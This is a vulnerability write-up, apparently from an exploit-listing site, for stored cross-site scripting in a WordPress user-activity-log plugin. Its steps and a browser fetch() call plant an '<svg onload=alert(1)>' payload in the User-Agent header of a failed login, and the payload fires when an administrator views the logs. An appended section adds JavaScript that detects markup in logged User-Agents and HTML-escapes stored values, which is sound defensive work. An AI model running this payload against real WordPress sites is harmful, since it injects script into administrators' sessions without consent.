## https://sploitus.com/exploit?id=WPEX-ID:78EA6FE0-5FAC-4923-949C-023C85FE2437
1) Make sure the plugin's `Enable User Agent For Log` setting is enabled at /wp-admin/admin.php?page=ualp_settings
2) If you're logged onto the site, log out.
3) While still on the site, send the following fetch() command from your browser's console:

```
await fetch("/wp-login.php", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0<svg onload=alert(1)//>",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1"
    },
    "referrer": "http://vulnerable-site.tld/wp-login.php",
    "body": "log=simpleadmin&pwd=invalidpassword&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1",
    "method": "POST",
    "mode": "cors"
});
```

4) Log back in as an administrator and view the user logs at /wp-admin/admin.php?page=ual_pro. You should get an alert box, which indicates the attack succeeded.
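
A defender-side check for the behaviour in the steps above, as an added example that is not part of the original write-up or the plugin's code: it scans web-server access logs for login requests whose User-Agent carries markup, and shows the output encoding a log viewer must apply before rendering that field. The log lines are constructed, and the function names and the combined log format are assumptions.

```javascript
// Constructed sample access-log lines (combined log format); not real traffic.
const SAMPLE_LOG = [
  '203.0.113.7 - - [12/Jul/2023:10:01:02 +0000] "POST /wp-login.php HTTP/1.1" 200 5120 "http://vulnerable-site.tld/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0<svg onload=alert(1)//>"',
  '198.51.100.4 - - [12/Jul/2023:10:02:10 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"',
  '198.51.100.9 - - [12/Jul/2023:10:03:44 +0000] "GET /feed/ HTTP/1.1" 200 812 "-" "curl/8.1.2"',
];

// ip, timestamp, method, path, status, referrer, user agent
const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "(.*)"$/;

// Parse one combined-format line; returns null when the line does not match.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, ip, time, method, path, status, referrer, userAgent] = m;
  return { ip, time, method, path, status: Number(status), referrer, userAgent };
}

// Legitimate User-Agent strings do not contain markup. Angle brackets, raw or
// escaped by the server or a proxy as \x3c / %3c, are the signal to review.
const MARKUP_RE = /[<>]|\\x3[ce]|%3[ce]/i;

// Return parsed entries for the given path whose User-Agent contains markup.
function findMarkupUserAgents(lines, pathPrefix = "/wp-login.php") {
  return lines
    .map(parseLine)
    .filter((e) => e && e.path.startsWith(pathPrefix) && MARKUP_RE.test(e.userAgent));
}

// Output encoding for the viewer side: a stored header value is untrusted
// input and must be encoded before it is placed in HTML text or attributes.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}
```

In WordPress code, the corresponding output-encoding helpers are `esc_html()` and `esc_attr()`.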